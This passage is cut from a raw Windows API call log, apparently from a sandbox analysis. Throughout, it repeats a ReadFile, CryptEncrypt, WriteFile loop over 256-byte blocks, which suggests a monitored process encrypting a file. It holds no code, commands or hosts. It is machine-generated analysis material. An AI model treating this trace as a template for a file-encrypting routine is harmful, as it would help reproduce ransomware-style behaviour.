lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.530] GetLastError () returned 0x0 [0167.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.530] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.531] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.531] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.532] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.532] GetLastError () returned 0x0 [0167.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.533] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.533] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, 